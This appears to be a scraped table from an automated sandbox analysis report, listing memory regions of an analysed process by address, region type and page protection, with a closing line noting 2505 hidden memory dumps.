|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E082C000
|
heap
|
page read and write
|
||
28D0000
|
trusted library allocation
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1BE40000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
24023E1A000
|
trusted library allocation
|
page read and write
|
||
1BDC47A7000
|
heap
|
page execute and read and write
|
||
7FFB4B430000
|
trusted library allocation
|
page execute and read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
E41000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1160000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
212F000
|
heap
|
page read and write
|
||
7FFB4B550000
|
trusted library allocation
|
page read and write
|
||
7FFB4B242000
|
trusted library allocation
|
page read and write
|
||
7DF43B4E0000
|
unkown
|
page read and write
|
||
1C447000
|
trusted library allocation
|
page read and write
|
||
7FFB4B25B000
|
trusted library allocation
|
page read and write
|
||
1BEC0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B5B0000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1AA3FF5C000
|
unkown
|
page read and write
|
||
1F9E0CF9000
|
heap
|
page read and write
|
||
1B4D8000
|
heap
|
page read and write
|
||
BF08273000
|
stack
|
page read and write
|
||
54DA000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
remote allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1BE10000
|
trusted library allocation
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
7FFB4B570000
|
trusted library allocation
|
page read and write
|
||
7FFB4B546000
|
trusted library allocation
|
page read and write
|
||
1BD80000
|
trusted library allocation
|
page read and write
|
||
1F3DAC1F000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
872B939000
|
stack
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E0411000
|
heap
|
page read and write
|
||
872C50E000
|
stack
|
page read and write
|
||
1B6F0000
|
trusted library allocation
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
1F9E041A000
|
heap
|
page read and write
|
||
22130820000
|
heap
|
page read and write
|
||
1BDC2E71000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
7FFB4B240000
|
trusted library allocation
|
page read and write
|
||
2212EF68000
|
heap
|
page read and write
|
||
1F9E0416000
|
heap
|
page read and write
|
||
1F3DE32F000
|
trusted library allocation
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1BE7F000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F3F4B41000
|
heap
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
541E000
|
heap
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
1F3DACC0000
|
trusted library section
|
page read and write
|
||
1B3A0000
|
trusted library allocation
|
page read and write
|
||
1AA3FEB0000
|
heap
|
page read and write
|
||
240206C0000
|
heap
|
page read and write
|
||
1BDD4A61000
|
trusted library allocation
|
page read and write
|
||
7FFB4B5D0000
|
trusted library allocation
|
page read and write
|
||
2A4ACDB7000
|
heap
|
page read and write
|
||
1F9E0330000
|
heap
|
page read and write
|
||
1340000
|
heap
|
page read and write
|
||
1C3A0000
|
trusted library allocation
|
page read and write
|
||
2403A9B8000
|
heap
|
page read and write
|
||
1F9E01B0000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1C000000
|
unkown
|
page read and write
|
||
1F9E0358000
|
heap
|
page read and write
|
||
1C3F0000
|
trusted library allocation
|
page read and write
|
||
24022220000
|
trusted library allocation
|
page read and write
|
||
7FFB4B2F6000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1BE90000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
5395000
|
heap
|
page read and write
|
||
1F3DE2AC000
|
trusted library allocation
|
page read and write
|
||
1AA41AF0000
|
heap
|
page read and write
|
||
296F000
|
heap
|
page read and write
|
||
2403A711000
|
heap
|
page read and write
|
||
1C1E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B3F1000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
3C046CD000
|
stack
|
page read and write
|
||
1F9E0234000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
872B839000
|
stack
|
page read and write
|
||
5411000
|
heap
|
page read and write
|
||
1F9DE087000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
24022C9B000
|
trusted library allocation
|
page read and write
|
||
1F9E0D70000
|
heap
|
page read and write
|
||
1BDC613F000
|
trusted library allocation
|
page read and write
|
||
1F9E0423000
|
heap
|
page read and write
|
||
1BDC2E06000
|
heap
|
page read and write
|
||
1F9E01FE000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B700000
|
trusted library allocation
|
page read and write
|
||
1F9E03FC000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1AA41F41000
|
heap
|
page read and write
|
||
1F3DAC03000
|
heap
|
page read and write
|
||
872B779000
|
stack
|
page read and write
|
||
BF1494C000
|
stack
|
page read and write
|
||
1C3C0000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
7FFB4B4D0000
|
trusted library allocation
|
page read and write
|
||
1B618000
|
heap
|
page read and write
|
||
1B461000
|
heap
|
page read and write
|
||
69F000
|
unkown
|
page write copy
|
||
1C3B0000
|
trusted library allocation
|
page read and write
|
||
1B6F0000
|
trusted library allocation
|
page read and write
|
||
1C460000
|
trusted library allocation
|
page read and write
|
||
1BDC2C70000
|
heap
|
page read and write
|
||
BF0954A000
|
stack
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E030F000
|
heap
|
page read and write
|
||
EC7000
|
heap
|
page read and write
|
||
2740000
|
trusted library allocation
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
24022E2F000
|
trusted library allocation
|
page read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
1F9E0334000
|
heap
|
page read and write
|
||
2246000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
7DF40FFA0000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1BDC2D87000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
24020670000
|
heap
|
page read and write
|
||
1BE00000
|
trusted library allocation
|
page read and write
|
||
374000
|
stack
|
page read and write
|
||
1C442000
|
trusted library allocation
|
page read and write
|
||
1F9DE09F000
|
heap
|
page read and write
|
||
7FFB4B580000
|
trusted library allocation
|
page read and write
|
||
2A4AE7B1000
|
heap
|
page read and write
|
||
7FFB4B28B000
|
trusted library allocation
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
1AA3FD50000
|
unkown
|
page read and write
|
||
1C220000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
7FFB4B454000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B5C6000
|
heap
|
page read and write
|
||
1BDC47A0000
|
heap
|
page execute and read and write
|
||
1BDC4A61000
|
trusted library allocation
|
page read and write
|
||
1F9E0D40000
|
heap
|
page read and write
|
||
2F20000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1B313000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
2FE3000
|
heap
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
24020960000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
BF085FD000
|
stack
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
2403A76E000
|
heap
|
page read and write
|
||
1B710000
|
trusted library allocation
|
page read and write
|
||
2A4ACD98000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B770000
|
trusted library allocation
|
page read and write
|
||
5390000
|
heap
|
page read and write
|
||
1F9E045A000
|
heap
|
page read and write
|
||
1BE80000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7FFB4B410000
|
trusted library allocation
|
page execute and read and write
|
||
5302000
|
heap
|
page read and write
|
||
7FFB4B326000
|
trusted library allocation
|
page execute and read and write
|
||
1C030000
|
trusted library allocation
|
page read and write
|
||
7FFB4B630000
|
trusted library allocation
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
2E29000
|
trusted library allocation
|
page read and write
|
||
1B529000
|
heap
|
page read and write
|
||
2402071D000
|
heap
|
page read and write
|
||
1C0C0000
|
trusted library allocation
|
page read and write
|
||
1B3C0000
|
trusted library allocation
|
page read and write
|
||
22130920000
|
heap
|
page read and write
|
||
7FFB4B5C4000
|
trusted library allocation
|
page read and write
|
||
24020985000
|
heap
|
page read and write
|
||
1AA41971000
|
heap
|
page read and write
|
||
7FFB4B650000
|
trusted library allocation
|
page read and write
|
||
1F9DE0AE000
|
heap
|
page read and write
|
||
1F3DAD20000
|
trusted library allocation
|
page read and write
|
||
24022190000
|
heap
|
page execute and read and write
|
||
780000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9DE0AE000
|
heap
|
page read and write
|
||
1BDDCFEA000
|
heap
|
page read and write
|
||
7FFBAA480000
|
unkown
|
page readonly
|
||
7DF43B4F0000
|
unkown
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1AA3FFDB000
|
heap
|
page read and write
|
||
7FFB4B4F0000
|
trusted library allocation
|
page read and write
|
||
1AA3FFD0000
|
heap
|
page read and write
|
||
C90000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BD60000
|
trusted library allocation
|
page read and write
|
||
24D912BB000
|
heap
|
page read and write
|
||
1AA41980000
|
heap
|
page read and write
|
||
8AD000
|
unkown
|
page readonly
|
||
1AA401C0000
|
heap
|
page read and write
|
||
1AA41E41000
|
heap
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B2AD000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1BFF0000
|
trusted library allocation
|
page read and write
|
||
1AA3FDD0000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
2403A8D0000
|
heap
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1C55A000
|
trusted library allocation
|
page read and write
|
||
1AA3FFEF000
|
heap
|
page read and write
|
||
294E000
|
stack
|
page read and write
|
||
1BDC6993000
|
trusted library allocation
|
page read and write
|
||
EC1000
|
heap
|
page read and write
|
||
979000
|
unkown
|
page readonly
|
||
1B51E000
|
heap
|
page read and write
|
||
1BE53000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1F3DE1C2000
|
trusted library allocation
|
page read and write
|
||
1AA419CA000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1C0B0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8D000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1AA3FD51000
|
unkown
|
page execute read
|
||
53C5000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1BDE0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B7EE000
|
stack
|
page read and write
|
||
BF14944000
|
stack
|
page read and write
|
||
1F9E0415000
|
heap
|
page read and write
|
||
1AA41FBF000
|
heap
|
page read and write
|
||
7FFB4B32C000
|
trusted library allocation
|
page execute and read and write
|
||
1B530000
|
trusted library allocation
|
page read and write
|
||
2630000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7FFB4B452000
|
trusted library allocation
|
page read and write
|
||
1C470000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1BFE3000
|
trusted library allocation
|
page read and write
|
||
240235D3000
|
trusted library allocation
|
page read and write
|
||
7FFB4B2FC000
|
trusted library allocation
|
page execute and read and write
|
||
231A86D1000
|
unkown
|
page execute read
|
||
7DF40FFB0000
|
trusted library allocation
|
page execute and read and write
|
||
1B6F0000
|
trusted library allocation
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
7FFBAA4AA000
|
unkown
|
page write copy
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
2743000
|
trusted library allocation
|
page read and write
|
||
1B6F7000
|
trusted library allocation
|
page read and write
|
||
1C540000
|
trusted library allocation
|
page read and write
|
||
7FFB4B510000
|
trusted library allocation
|
page read and write
|
||
2403A9C4000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
24022313000
|
trusted library allocation
|
page read and write
|
||
3C03B7E000
|
stack
|
page read and write
|
||
1B53D000
|
heap
|
page read and write
|
||
1F9E0D60000
|
heap
|
page read and write
|
||
2B11000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
7FFB4B28D000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E02FF000
|
heap
|
page read and write
|
||
2B8F000
|
trusted library allocation
|
page read and write
|
||
1C362000
|
unkown
|
page read and write
|
||
1F3F4B04000
|
heap
|
page read and write
|
||
5385000
|
heap
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
7DF43B4F1000
|
unkown
|
page execute read
|
||
1BDDCEC0000
|
heap
|
page read and write
|
||
7FFB4B530000
|
trusted library allocation
|
page read and write
|
||
1BDDCFAF000
|
heap
|
page read and write
|
||
1040000
|
heap
|
page read and write
|
||
1AA4198B000
|
heap
|
page read and write
|
||
28A0000
|
trusted library allocation
|
page read and write
|
||
1C403000
|
trusted library allocation
|
page read and write
|
||
1F9E0857000
|
unkown
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F3DE36A000
|
trusted library allocation
|
page read and write
|
||
2553000
|
heap
|
page read and write
|
||
1F9E0427000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B5DC000
|
trusted library allocation
|
page read and write
|
||
1B22C000
|
heap
|
page execute and read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F3F4F18000
|
heap
|
page read and write
|
||
1B710000
|
trusted library allocation
|
page read and write
|
||
2402078E000
|
heap
|
page read and write
|
||
7FFB4B360000
|
trusted library allocation
|
page execute and read and write
|
||
1C120000
|
trusted library allocation
|
page read and write
|
||
7FFB4B424000
|
trusted library allocation
|
page read and write
|
||
1F9E0234000
|
heap
|
page read and write
|
||
2402424A000
|
trusted library allocation
|
page read and write
|
||
1BDDCDDE000
|
heap
|
page read and write
|
||
2201000
|
heap
|
page read and write
|
||
7FFB4B5C9000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1AE90000
|
heap
|
page read and write
|
||
7FFB4B270000
|
trusted library allocation
|
page read and write
|
||
1AA41971000
|
heap
|
page read and write
|
||
231A8719000
|
unkown
|
page read and write
|
||
1B461000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
1F9E036B000
|
heap
|
page read and write
|
||
BF086F7000
|
stack
|
page read and write
|
||
1C2B0000
|
trusted library allocation
|
page read and write
|
||
872C60E000
|
stack
|
page read and write
|
||
1BDC49D0000
|
heap
|
page execute and read and write
|
||
7FFB4B3F1000
|
trusted library allocation
|
page read and write
|
||
1B690000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1F9E02FF000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1C360000
|
trusted library allocation
|
page read and write
|
||
7FFB4B600000
|
trusted library allocation
|
page read and write
|
||
1F3F4D84000
|
heap
|
page read and write
|
||
1B75B000
|
stack
|
page read and write
|
||
1F9E0CA0000
|
heap
|
page read and write
|
||
1C110000
|
trusted library allocation
|
page read and write
|
||
1F3DE58E000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
12B46000
|
trusted library allocation
|
page read and write
|
||
2403AA65000
|
heap
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
1BED0000
|
trusted library allocation
|
page read and write
|
||
1BDC46C0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B5D0000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
2241000
|
heap
|
page read and write
|
||
7FFB4B3E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0357000
|
heap
|
page read and write
|
||
28DE000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1BE75000
|
trusted library allocation
|
page read and write
|
||
2B7E000
|
trusted library allocation
|
page read and write
|
||
2EA7000
|
trusted library allocation
|
page read and write
|
||
1C010000
|
trusted library allocation
|
page read and write
|
||
1B450000
|
trusted library allocation
|
page read and write
|
||
1F3DC847000
|
trusted library allocation
|
page read and write
|
||
1BDD4ACE000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F3F4DC3000
|
heap
|
page read and write
|
||
1F9E07D2000
|
unkown
|
page read and write
|
||
1C1B0000
|
trusted library allocation
|
page read and write
|
||
12E0000
|
heap
|
page read and write
|
||
CF0000
|
heap
|
page read and write
|
||
F175FAA000
|
stack
|
page read and write
|
||
1C4E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F3F4E9D000
|
heap
|
page read and write
|
||
2ECD000
|
trusted library allocation
|
page read and write
|
||
A7E174C000
|
stack
|
page read and write
|
||
DAE000
|
stack
|
page read and write
|
||
7FF7F064F000
|
direct allocation
|
page execute and read and write
|
||
1BDC614F000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
DC2000
|
heap
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
2EA9000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1C440000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
7FFB4B5C0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1C260000
|
trusted library allocation
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
7FFB4B520000
|
trusted library allocation
|
page read and write
|
||
24D914B0000
|
heap
|
page read and write
|
||
7FF63D220000
|
unkown
|
page readonly
|
||
24D914D0000
|
heap
|
page readonly
|
||
2CE0000
|
heap
|
page read and write
|
||
7FFB4B29C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4B29D000
|
trusted library allocation
|
page execute and read and write
|
||
1BDC4C92000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
7FFB4B450000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
24021FF0000
|
heap
|
page readonly
|
||
240232CE000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
2760000
|
trusted library allocation
|
page read and write
|
||
1C190000
|
trusted library allocation
|
page read and write
|
||
1C1A0000
|
trusted library allocation
|
page read and write
|
||
813000
|
heap
|
page read and write
|
||
33EF000
|
stack
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1C580000
|
trusted library allocation
|
page read and write
|
||
1F9E0D48000
|
heap
|
page read and write
|
||
1B5AD000
|
heap
|
page read and write
|
||
7FFB4B282000
|
trusted library allocation
|
page read and write
|
||
1BDBF000
|
stack
|
page read and write
|
||
1B323000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
24021FC0000
|
trusted library allocation
|
page read and write
|
||
1AA41F41000
|
heap
|
page read and write
|
||
872B67A000
|
stack
|
page read and write
|
||
7FFB4B272000
|
trusted library allocation
|
page read and write
|
||
1F9E0D40000
|
heap
|
page read and write
|
||
1B500000
|
trusted library allocation
|
page read and write
|
||
1B3F0000
|
trusted library allocation
|
page read and write
|
||
1F3F4C50000
|
trusted library allocation
|
page read and write
|
||
75B000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
27D0000
|
heap
|
page read and write
|
||
1F9E040C000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
872C58D000
|
stack
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
2601000
|
heap
|
page read and write
|
||
7FF7F03B0000
|
direct allocation
|
page execute and read and write
|
||
1C000000
|
trusted library allocation
|
page read and write
|
||
1BE90000
|
trusted library allocation
|
page read and write
|
||
BF094CA000
|
stack
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
2A4ACB50000
|
unkown
|
page read and write
|
||
7FFB4B284000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
remote allocation
|
page read and write
|
There are 2505 hidden memdumps, click here to show them.